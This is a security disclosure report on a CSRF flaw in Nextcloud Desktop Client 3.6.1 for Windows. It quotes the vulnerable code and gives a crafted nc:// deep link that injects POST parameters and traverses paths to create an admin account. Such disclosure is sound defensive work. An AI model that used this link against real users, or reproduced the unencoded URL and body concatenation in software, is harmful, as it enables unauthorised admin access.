Nextcloud: CSRF vulnerability in Nextcloud Desktop Client 3.6.1 on Windows when clicking malicious link

Summary

It is possible to make a user send any POST request with an arbitrary body given they click on a malicious deep link. (e.g. in an email, chat link, etc)

This vulnerability was introduced in an attempt to fix #1720043. The patch however can be bypassed and also introduced a CSRF vulnerability.

Steps To Reproduce:

The following reproduction steps send a OCS API request to the /ocs/v1.php/cloud/users endpoint with the following post body: path=/.\&userid=hacker&password=h4ck3rPassw0Rd!&displayName=hacker&[email protected]&groups[]=admin&\..\.owncloudsync.log. If the victim is not an administrator, one would need to target another controller.

1. Open the following deeplink on a Windows machine with the Nextcloud Desktop Client installed. Make sure to adjust the victim username and instance URL: nc://open/[email protected]/.\&userid=hacker&password=h4ck3rPassw0Rd!&displayName=hacker&[email protected]&groups[]=admin&\..\.owncloudsync.log?token=../../../../../../../ocs/v1.php/cloud/users
2. Verify that a user called “hacker” is created on the instance and added to the admin group.

Root cause

The attempt to fix #1720043 was done with https://github.com/nextcloud/desktop/pull/5055 and introduced the following code:

    const auto checkTokenForEditLocally = new SimpleApiJob(accountFound->account(), QStringLiteral("/ocs/v2.php/apps/files/api/v1/openlocaleditor/%1").arg(token));
    checkTokenForEditLocally->setVerb(SimpleApiJob::Verb::Post);
    checkTokenForEditLocally->setBody(QByteArray{"path=/"}.append(relPath.toUtf8()));

There are two vulnerabilities here that can be chained together:

• Token is not encoded:token is concatenated directly into the URL and not properly encoded. Passing a token such like ?token=../../../../../../../ocs/v1.php/cloud/users will make the request therefore go to /ocs/v2.php/apps/files/api/v1/openlocaleditor/../../../../../../../ocs/v1.php/cloud/users which means /ocs/v1.php/cloud/users.
• Relative file path is not encoded: relPath is concatenated directly into the POST body and not properly encoded. Passing a path such as .\&userid=hacker&password=h4ck3rPassw0Rd!&displayName=hacker&[email protected]&groups[]=admin&\..\.owncloudsync.log will therefore create several request POST parameters. (Note: ./owncloudsync.log is a default file which I use here to ensure the file exists check earlier in the code works)

Supporting Material/References:

• Screenshot of the request: F1992646
• Screenshot of the created user: F1992654

Disclosure Policy

Please note that all bugs reported by Authentick GmbH will be publicly disclosed within 90 days of vendor notification. In extraordinary cases we may increase that upon request by the vendor.

Impact

It is possible to make a user send any POST request with an arbitrary body given they click on a malicious deep link. (e.g. in an email, chat link, etc)